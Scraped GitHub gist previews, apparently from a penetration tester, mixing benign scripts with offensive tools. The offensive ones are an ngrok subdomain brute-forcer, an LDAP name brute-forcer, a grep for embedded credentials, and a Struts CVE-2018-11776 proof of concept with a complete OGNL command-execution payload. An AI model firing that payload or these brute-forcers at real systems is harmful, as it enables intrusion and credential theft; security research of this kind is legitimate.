This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
from selenium import webdriver | |
import argparse | |
import re | |
from time import sleep | |
def get_links(url): | |
options = webdriver.ChromeOptions() | |
options.add_argument('--ignore-certificate-errors') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import langdetect | |
from langdetect import detect | |
def ascii_hex_to_bytes(hex_input): | |
return bytearray.fromhex(hex_input) | |
with open('Downloads/cryptopals-challenge4.txt') as f: | |
xorinput=f.readlines() | |
xor2 = [line.strip() for line in xorinput] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
#brute ngrok's subdomain pattern | |
import requests | |
import itertools | |
for sub in itertools.product("0123456789abcdef", repeat=8): | |
host = "".join(sub) + ".ngrok.io" | |
print(host) | |
reply = requests.get("http://18.188.14.65", headers={"Host": host}) | |
if "Tunnel " + host + " not found" not in reply.text: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# user : pass @ whatever | |
grep -Pi '[^\s]*:[^\s]*@[^\s]*' * --color |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
List lightsail boxes: | |
alias aws_lightsail_list='aws lightsail get-instances --query="instances[*].{Name:name, IP:publicIpAddress, Username:username, State:state.name, key:sshKeyName}" --output=table' | |
List ec2 boxes: | |
alias aws_ec2_list='aws ec2 describe-instances --query="Reservations[*].Instances[*].{Launched:LaunchTime, State:State.Name, Key:KeyName, IP:PublicIpAddress, Tags:Tags[0].Value, Region:Placement.AvailabilityZone}" --output=table' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import socket | |
import ssl | |
def is_SSL_enabled(ip, port): | |
""" | |
Attempts a SSL connection to the specified ip:port | |
Note: Does not handle STARTTLS yet | |
returns True if handshake was successful, false if not | |
""" | |
context = ssl.create_default_context() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# @atucom 2018 | |
# This script, given credentials and a host, will clone all the git repos | |
# from a bitbucket server into appropriately named project folders locally. | |
# Just update the username, password, and host, and let it go. | |
import stashy | |
import os | |
import subprocess |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# @atucom 2018 | |
# This tool brutes all cn attributes from ldap recursively. | |
# Additionally, if a result limit is exceeded, it will drill down farther and keep going | |
import os | |
import subprocess | |
import string |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
# Simple PoC for the Apache Struts vuln CVE-2018-11776 | |
# this currently works on the struts showcase app but can easily be adapted to anything | |
# Thanks to https://github.com/jas502n/St2-057 for working OGNL statements :D (proper URL encoding REALLY matters) | |
# @atucom | |
def runCMD(command): | |
target = 'http://192.168.235.181:8080/struts3-showcase/' | |
payload = '%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27' + command + '%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action' | |
return requests.get(target + payload).text |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from lxml import html | |
import lxml | |
import os | |
from collections import defaultdict | |
def getIngredients(htmlFile): | |
# Returns the ingredients from an html file | |
try: | |
tree = html.fromstring(htmlFile) | |
except lxml.etree.ParserError: |